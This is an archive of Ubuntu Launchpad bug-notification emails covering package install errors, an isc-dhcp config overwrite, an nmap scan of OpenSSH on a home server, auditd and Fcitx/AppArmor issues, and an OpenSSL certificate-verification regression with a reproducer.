- sudo apt install timeshift Reading package lists... Done Building dependency 
treeReading state information... Done The following NEW packages will 
be installed:   timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not 
upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. 
After this operation, 3,323 kB of additional disk space will be used. Get:1 
http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 
20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) 
  Selecting previously unselected package timeshift. (Reading database ... 
191451 files and directories currently installed.) Preparing to unpack 
.../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... 
Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common 
(3.192.30.7) ... ttf-mscorefonts-installer: processing... 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/andale32.exe 
/usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: 
apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes   real_sha256 = 
apt_pkg.sha256sum(dest_file_obj) ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/arial32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/arialb32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/comic32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/courie32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/georgi32.exe Get:1 
http://downloads.sourceforge.net/corefonts/georgi32.exe [392 kB] Fetched 392 kB 
in 8s (46.6 kB/s)
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/impact32.exe Get:1 
http://downloads.sourceforge.net/corefonts/impact32.exe [173 kB] Fetched 173 kB 
in 20s (8,707 B/s)   
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/times32.exe Get:1 
http://downloads.sourceforge.net/corefonts/times32.exe [662 kB] Fetched 662 kB 
in 35s (19.1 kB/s)   
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/trebuc32.exe Get:1 
http://downloads.sourceforge.net/corefonts/trebuc32.exe [357 kB] Fetched 357 kB 
in 21s (16.8 kB/s)   
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/verdan32.exe Err:1 
http://downloads.sourceforge.net/corefonts/verdan32.exe   Could not open file 
/var/lib/update-notifier/package-data-downloads/partial/ve rdan32.exe - open 
(40: Too many levels of symbolic links) [IP: 203.135.147.10 44 3] E: Failed to 
fetch https://udomain.dl.sourceforge.net/project/corefonts/the font 
s/final/verdan32.exe  Could not open file 
/var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open 
(40: Too many levels of symbolic links) [I P: 203.135.147.10 443] E: Download 
Failed Processing triggers for desktop-file-utils (0.24-1ubuntu3) ... 
Processing triggers for mime-support (3.64ubuntu1) ... Processing triggers for 
hicolor-icon-theme (0.17-2) ... Processing triggers for gnome-menus 
(3.36.0-1ubuntu1) ... Processing triggers for man-db (2.9.1-1) ...
+ Could not open file /var/lib/update-notifier/package-data- 
downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links)

** Description changed:

  app  installation is not properly fixed
  files arenot properly installed and it gives alot of error
+ 
+ === from title ===
+ sudo apt install timeshift Reading package lists... Done Building dependency 
treeReading state information... Done The following NEW packages will 
be installed:   timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not 
upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. 
After this operation, 3,323 kB of additional disk space will be used. Get:1 
http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 
20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) 
  Selecting previously unselected package timeshift. (Reading database ... 
191451 files and directories currently installed.) Preparing to unpack 
.../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... 
Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common 
(3.192.30.7) ... ttf-mscorefonts-installer: processing... 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/andale32.exe 
/usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: 
apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes   real_sha256 = 
apt_pkg.sha256sum(dest_file_obj) 

[Touch-packages] [Bug 1930103] Re: isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update

2021-05-28 Thread Seth Arnold
Hello Milan, I just tested an upgrade:

Unpacking isc-dhcp-server (4.4.1-2.1ubuntu5.20.04.2) over
(4.4.1-2.1ubuntu5) ...

and my /etc/default/isc-dhcp-server modifications had been left in
place.

The maintainer scripts will create a new one if the file cannot be read:
https://sources.debian.org/src/isc-dhcp/4.4.1-2.2/debian/isc-dhcp-server.postinst/#L33

(Debian sources, but Ubuntu's are very similar.)

Is it possible your old /etc/default/isc-dhcp-server could not be read?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1930103

Title:
  isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  Today an unattended upgrade of ISC DHCPD overwrote the config file
  /etc/default/isc-dhcp-server and set the wrong interface where the daemon
  has to listen (eno2 instead of br0 as was set before the update).

  I see no backup file of the original config file so I had to investigate
  where the problem was.

  An update must never overwrite a config file and throw away the previous
  version.

  /var/log/apt/history.log:
  Start-Date: 2021-05-28  06:17:41
  Commandline: /usr/bin/unattended-upgrade
  Upgrade: isc-dhcp-server:amd64 (4.4.1-2.1ubuntu5, 4.4.1-2.1ubuntu5.20.04.2)
  End-Date: 2021-05-28  06:17:47

  root@linux:~# ls -l /etc/default/isc-dhcp-server
  -rw-r--r-- 1 root root 629 May 28 06:17 /etc/default/isc-dhcp-server

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1930103/+subscriptions



[Touch-packages] [Bug 1929758] Re: OpenSSH vulnerabilities

2021-05-28 Thread Seth Arnold
Great, thanks Ian.

** Package changed: ubuntu => openssh (Ubuntu)

** Changed in: openssh (Ubuntu)
   Status: Incomplete => Invalid

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1929758

Title:
  OpenSSH vulnerabilities

Status in openssh package in Ubuntu:
  Invalid

Bug description:
  Hi,

  I was using NMAP to scan my Ubuntu server and it listed some
  vulnerabilities in OpenSSH. It also came up with exploits against
  these vulnerabilities.

  On my home network, I have several computers that I use for various
  purposes; a Ubuntu 20.04 LTS computer and Kali Linux computer being
  the subject for this email. I wanted to test if I had any security
  issues on my Ubuntu computer so I was doing some scans on it from my
  Kali computer. I did a scan with NMAP and it produced some
  vulnerabilities in OpenSSH and what exploits to use. Here is some info
  on my computers and the NMAP command that I used:

  ~$ lsb_release -a
  No LSB modules are available.
  Distributor ID:   Ubuntu
  Description:  Ubuntu 20.04.2 LTS
  Release:  20.04
  Codename: focal

  ─$ lsb_release -a
  No LSB modules are available.
  Distributor ID:   Kali
  Description:  Kali GNU/Linux Rolling
  Release:  2021.1
  Codename: kali-rolling

  ~$ ssh -V
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f  31 Mar 2020

  ~$ apt-cache policy ssh
  ssh:
    Installed: (none)
    Candidate: 1:8.2p1-4ubuntu0.2
    Version table:
       1:8.2p1-4ubuntu0.2 500
          500 http://ca.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
          500 http://ca.archive.ubuntu.com/ubuntu focal-security/main amd64 Packages
       1:8.2p1-4 500
          500 http://ca.archive.ubuntu.com/ubuntu focal/main amd64 Packages

  
  ─$ sudo nmap -sV --script vuln 192.168.0.10
  Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:26 PDT
  Pre-scan script results:
  | broadcast-avahi-dos: 
  |   Discovered hosts:
  | 224.0.0.251
  |   After NULL UDP avahi packet DoS (CVE-2011-1002).
  |_  Hosts are all up (not vulnerable).
  Nmap scan report for 192.168.0.10
  Host is up (0.00017s latency).
  Not shown: 995 filtered ports
  PORT    STATE  SERVICE   VERSION
  20/tcp  closed ftp-data
  21/tcp  closed ftp
  22/tcp  open   ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
  | vulners: 
  |   cpe:/a:openbsd:openssh:8.2p1: 
  |     EDB-ID:21018  10.0  https://vulners.com/exploitdb/EDB-ID:21018  *EXPLOIT*
  |     CVE-2001-0554  10.0  https://vulners.com/cve/CVE-2001-0554
  |     CVE-2020-15778  6.8  https://vulners.com/cve/CVE-2020-15778
  |     CVE-2020-12062  5.0  https://vulners.com/cve/CVE-2020-12062
  |     CVE-2021-28041  4.6  https://vulners.com/cve/CVE-2021-28041
  |     MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/  4.3  https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/  *EXPLOIT*
  |     MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/  4.3  https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/  *EXPLOIT*
  |     MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/  4.3  https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/  *EXPLOIT*
  |     MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/  4.3  https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/  *EXPLOIT*
  |     MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/  4.3  https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/  *EXPLOIT*
  |     CVE-2020-14145  4.3  https://vulners.com/cve/CVE-2020-14145
  |_    MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/  0.0  https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/  *EXPLOIT*
  80/tcp  open   http      Apache httpd
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-server-header: Apache
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  443/tcp open   ssl/http  Apache httpd
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-server-header: Apache
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  |_sslv2-drown: 
  MAC Address: 00:15:C5:F6:5D:94 (Dell)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 80.86 seconds

  Thanks,
  Ian

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1929758/+subscriptions

-- 

[Touch-packages] [Bug 1152187] Re: [MIR] systemd

2021-05-25 Thread Seth Arnold
The usual way we determine if a package is in main or not is to check
the package lists; will the promotion step make the systemd-container
binary package visible to package lists or rmadison output?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1152187

Title:
  [MIR] systemd

Status in systemd package in Ubuntu:
  Fix Released
Status in systemd source package in Bionic:
  Incomplete

Bug description:
  * The package is in universe and built on all archs:
  https://launchpad.net/ubuntu/+source/systemd/44-10ubuntu1

  * Rationale:

  - in a first step we want systemd-services promoted to replace ubuntu-
  system-services

  -  We will also want to move from consolekit to logind soon
  (https://blueprints.launchpad.net/ubuntu/+spec/foundations-1303
  -consolekit-logind-migration)

  - udev has been merged in the systemd source upstream so we will want
  to build it from there at some point as well

  we don't plan to use the systemd init system at this point

  * Security:

  there has been some security issues in the past
  http://secunia.com/advisories/search/?search=systemd
  http://secunia.com/advisories/48220/
  http://secunia.com/advisories/48208/
  http://secunia.com/advisories/48331/

  Those are mostly logind issue and have been fixed upstream.

  Our current package is outdated but we do plan to update it before
  starting using logind. There should be no issue with the services

  * Quality:
  - there is no RC bug in debian: http://bugs.debian.org/cgi-bin/pkgreport.cgi?repeatmerged=no=systemd
  - there is no bug open in launchpad: https://launchpad.net/ubuntu/+source/systemd/+bugs
  - upstream is active and responsive to issues

  The desktop bugs team is subscribed to the package in launchpad,
  foundations/desktop will maintain the package and look to the bug
  reports regularly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1152187/+subscriptions



[Touch-packages] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese

2021-05-24 Thread Seth Arnold
Gunnar, indeed, it had much less in it than I expected; I don't know
much about the snap packaging for Chromium, but it looked to me like it
was trying to do bluetooth things and that's all that was denied.

I'm no fcitx expert but I didn't think it looked related.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1928360

Title:
  Switch to Fcitx 5 for Chinese

Status in Lubuntu default settings:
  New
Status in Ubuntu Kylin:
  In Progress
Status in apparmor package in Ubuntu:
  New
Status in language-selector package in Ubuntu:
  Fix Released

Bug description:
  In Debian 11 Fcitx 5 will be the default IM framework for Chinese on
  non-GNOME desktops. I can think it's time to make the equivalent
  changes in Ubuntu 21.10 as well.

  I'd appreciate input on the topic from the Ubuntu Kylin team as well
  as other Chinese speaking users.

To manage notifications about this bug go to:
https://bugs.launchpad.net/lubuntu-default-settings/+bug/1928360/+subscriptions



Re: [Touch-packages] [apparmor] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese

2021-05-18 Thread Seth Arnold
On Tue, May 18, 2021 at 07:39:48PM -, Gunnar Hjalmarsson wrote:
> On 2021-05-16 22:23, Gunnar Hjalmarsson wrote:
> > As regards apparmor it's possible that no change is needed.
> 
> Well, I simply tested with the Chromium snap. fcitx5 does not work in
> Chromium, while fcitx4 does. So something needs to be done.

Excellent, can you paste the DENIED lines from your test into the bug
report?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1928360

Title:
  Switch to Fcitx 5 for Chinese

Status in Lubuntu default settings:
  New
Status in Ubuntu Kylin:
  New
Status in apparmor package in Ubuntu:
  New
Status in language-selector package in Ubuntu:
  In Progress

Bug description:
  In Debian 11 Fcitx 5 will be the default IM framework for Chinese on
  non-GNOME desktops. I can think it's time to make the equivalent
  changes in Ubuntu 21.10 as well.

  I'd appreciate input on the topic from the Ubuntu Kylin team as well
  as other Chinese speaking users.

To manage notifications about this bug go to:
https://bugs.launchpad.net/lubuntu-default-settings/+bug/1928360/+subscriptions



[Touch-packages] [Bug 1873627] Re: auditd fails after moving /var it a new filesystem and turning /var/run into a symlink to /run

2021-05-13 Thread Seth Arnold
Thanks for the strace, these looked like the 'important' parts:

sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=3, 
pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...},
 56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56
poll([{fd=3, events=POLLIN}], 1, 500)   = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242}, 
{error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=3, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, 
nl_groups=}, [12]) = 76
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242}, 
{error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=3, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 
[12]) = 76
write(2, "Error setting audit daemon pid ("..., 44Error setting audit daemon 
pid (File exists)) = 44

...

write(2, "The audit daemon is exiting.", 28The audit daemon is exiting.) = 28
write(2, "\n", 1
)   = 1
sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=4, 
pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...},
 56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56
poll([{fd=3, events=POLLIN}], 1, 500)   = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242}, 
{error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=4, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, 
nl_groups=}, [12]) = 76
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242}, 
{error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=4, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 
[12]) = 76
write(2, "Error setting audit daemon pid ("..., 50Error setting audit daemon 
pid (Permission denied)) = 50
write(2, "\n", 1
)   = 1

I don't understand why it's issuing an AUDIT_SET command after it
already decided to exit -- maybe it's just trying to tear itself down
cleanly.


I found a few cases in the kernel code for returning both file exists and 
permission denied:

kernel/audit.c audit_netlink_ok():

        /* Only support auditd and auditctl in initial pid namespace
         * for now. */
        if (task_active_pid_ns(current) != &init_pid_ns)
                return -EPERM;

                if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
                        err = -EPERM;
                break;


kernel/audit.c audit_receive_msg():

                auditd_pid = auditd_pid_vnr();
                if (auditd_pid) {
                        /* replacing a healthy auditd is not allowed */
                        if (new_pid) {
                                audit_log_config_change("audit_pid",
                                                new_pid, auditd_pid, 0);
                                return -EEXIST;
                        }


kernel/audit.c audit_set_feature():

                /* are we changing a locked feature? */
                if (old_lock && (new_feature != old_feature)) {
                        audit_log_feature_change(i, old_feature, new_feature,
                                                 old_lock, new_lock, 0);
                        return -EPERM;
                }


Do any of these feel applicable to your environment?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to audit in Ubuntu.
https://bugs.launchpad.net/bugs/1873627

Title:
  auditd fails after moving /var it a new filesystem and turning
  /var/run into a symlink to /run

Status in audit package in Ubuntu:
  Confirmed

Bug description:
  Auditd was working on my system (Ubuntu 18.04LTS, kernel
  4.15.0-1065-aws) until recently. But after splitting off /var into a
  new filesystem it fails to launch.

  running '/sbin/auditd -f' as root indicates a problem writing the pid file 
(no file exists even when it says one does) Post config load command output: 
  Started dispatcher: 

[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs

2021-05-03 Thread Seth Arnold
Matthew, thanks so much! sounds good to me.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1926254

Title:
  x509 Certificate verification fails when
  basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs

Status in openssl package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  In Progress
Status in openssl source package in Groovy:
  In Progress
Status in openssl source package in Hirsute:
  Fix Released

Bug description:
  [Impact]

  In openssl 1.1.1f, the below commit was merged:

  commit ba4356ae4002a04e28642da60c551877eea804f7
  Author: Bernd Edlinger 
  Date:   Sat Jan 4 15:54:53 2020 +0100
  Subject: Fix error handling in x509v3_cache_extensions and related functions
  Link: 
https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7

  This introduced a regression which caused certificate validation to
  fail when certificates violate RFC 5280 [1], namely, when a
  certificate has "basicConstraints=CA:FALSE,pathlen:0". This
  combination is commonly seen by self-signed leaf certificates with an
  intermediate CA before the root CA.

  Because of this, openssl 1.1.1f rejects these certificates and they
  cannot be used in the system certificate store, and ssl connections
  fail when you try to use them to connect to a ssl endpoint.

  The error you see when you try to verify is:

  $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem
  error 20 at 0 depth lookup: unable to get local issuer certificate
  error user1_cert.pem: verification failed

  The exact same certificates work fine on Xenial, Bionic and Hirsute.

  [1] https://tools.ietf.org/html/rfc5280.html

  [Testcase]

  We will create our own root CA, intermediate CA and leaf server
  certificate.

  Create necessary directories:

  $ mkdir reproducer
  $ cd reproducer
  $ mkdir CA

  Write openssl configuration files to disk for each CA and cert:

  $ cat << EOF >> rootCA.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test RSA PSS Root-CA

  [ usr_cert ]
  basicConstraints= critical,CA:TRUE
  keyUsage= critical,keyCertSign,cRLSign
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  $ cat << EOF >> subCA.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test RSA PSS Sub-CA

  [ usr_cert ]
  basicConstraints= critical,CA:TRUE,pathlen:0
  keyUsage= critical,keyCertSign,cRLSign
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  $ cat << EOF >> user.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test User

  [ usr_cert ]
  basicConstraints= critical,CA:FALSE,pathlen:0
  keyUsage= critical,digitalSignature,keyAgreement
  extendedKeyUsage= clientAuth,serverAuth
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  Then generate the necessary RSA keys and form certificates:

  $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt rsa_keygen_bits:2048
  $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes -x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1

  $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt rsa_keygen_bits:2048
  $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt -CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 4380 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ c_rehash CA

  $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt rsa_keygen_bits:2048
  $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ openssl x509 -req -sha256 -in user1_req.pem -CA CA/subCA_cert.pem -CAkey subCA_key.pem -out user1_cert.pem -CAserial subCA_serial.txt -CAcreateserial -extfile user.cnf -extensions usr_cert -days 1825 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1

  Now, let's try to verify the generated certificates:

  $ openssl version
  OpenSSL 1.1.1f  31 Mar 2020
  $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem
  error 20 at 0 depth lookup: unable to 
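
RFC 5280 section 4.2.1.9 allows pathLenConstraint only when cA is TRUE, which is the rule the user.cnf profile in the test case above breaks. As an added example (not code from the bug report or from OpenSSL), this stdlib-only Python linter decodes a basicConstraints extension value and flags that combination; the byte strings are hand-encoded stand-ins for the test case's three usr_cert sections, and the keyCertSign half of the rule is not checked.

```python
"""Lint the DER value of an X.509 basicConstraints extension.

Added example. Checks one RFC 5280 section 4.2.1.9 rule:
pathLenConstraint may only be present when cA is TRUE.
"""


def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the DER TLV that starts at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("value runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def parse_basic_constraints(ext_value):
    """Decode BasicConstraints ::= SEQUENCE {
           cA                BOOLEAN DEFAULT FALSE,
           pathLenConstraint INTEGER (0..MAX) OPTIONAL }
    and return (ca, path_len), with path_len None when the field is absent."""
    tag, body, end = read_tlv(ext_value, 0)
    if tag != 0x30 or end != len(ext_value):
        raise ValueError("expected exactly one SEQUENCE")
    ca, path_len, pos = False, None, 0
    if pos < len(body) and body[pos] == 0x01:  # BOOLEAN cA
        _, val, pos = read_tlv(body, pos)
        if len(val) != 1:
            raise ValueError("BOOLEAN must be one octet")
        ca = val != b"\x00"
    if pos < len(body) and body[pos] == 0x02:  # INTEGER pathLenConstraint
        _, val, pos = read_tlv(body, pos)
        if not val:
            raise ValueError("empty INTEGER")
        path_len = int.from_bytes(val, "big", signed=True)
    if pos != len(body):
        raise ValueError("unexpected data after pathLenConstraint")
    return ca, path_len


def lint(ext_value):
    """Return a list of findings for one basicConstraints extension value."""
    ca, path_len = parse_basic_constraints(ext_value)
    findings = []
    if path_len is not None and not ca:
        findings.append("pathLenConstraint present but cA is FALSE")
    if path_len is not None and path_len < 0:
        findings.append("pathLenConstraint is negative")
    return findings


# Constructed extension values for the three usr_cert sections of the test
# case. They are hand-encoded here, not extracted from the reproducer's
# certificates; a FALSE cA is omitted because DER drops DEFAULT values.
ROOT_CA = bytes.fromhex("30030101ff")        # CA:TRUE
SUB_CA = bytes.fromhex("30060101ff020100")   # CA:TRUE,pathlen:0
USER = bytes.fromhex("3003020100")           # CA:FALSE,pathlen:0

if __name__ == "__main__":
    for name, der in (("rootCA", ROOT_CA), ("subCA", SUB_CA), ("user", USER)):
        ca, path_len = parse_basic_constraints(der)
        print(f"{name}: cA={ca} pathLen={path_len} findings={lint(der)}")
```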

[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs

2021-04-30 Thread Seth Arnold
Hello Dan and Matthew, thanks for working on this. I gave the debdiffs a
look, skimmed through openssl changes, and don't see any reason to not
do this. There *are* larger changes to that function in
https://github.com/openssl/openssl/commit/1e41dadfa7b9f792ed0f4714a3d3d36f070cf30e
-- but it's a fairly invasive change, and I'm not recommending or
suggesting we take it instead. It'd be nice though if someone could
double-check the certs in question against a build that uses this newer
commit and make sure that we're not backporting a very short-lived
functional change.

Thanks


[Touch-packages] [Bug 1892559] Re: [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite

2021-04-29 Thread Seth Arnold
Thanks Marco, I'll take pam-pkcs11 off our todo list. (This can be
reversed, of course. If it turns out to be necessary for something,
someone shout. :)

Thanks

** Changed in: pam-pkcs11 (Ubuntu)
   Status: New => Invalid

** Changed in: pam-pkcs11 (Ubuntu)
 Assignee: Ubuntu Security Team (ubuntu-security) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pcsc-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1892559

Title:
  [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite

Status in ccid package in Ubuntu:
  New
Status in opensc package in Ubuntu:
  Incomplete
Status in pam-pkcs11 package in Ubuntu:
  Invalid
Status in pcsc-lite package in Ubuntu:
  New
Status in pcsc-perl package in Ubuntu:
  Invalid
Status in pcsc-tools package in Ubuntu:
  Invalid

Bug description:
  ==> ccid <==
  [Availability]
  ccid is in universe, and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

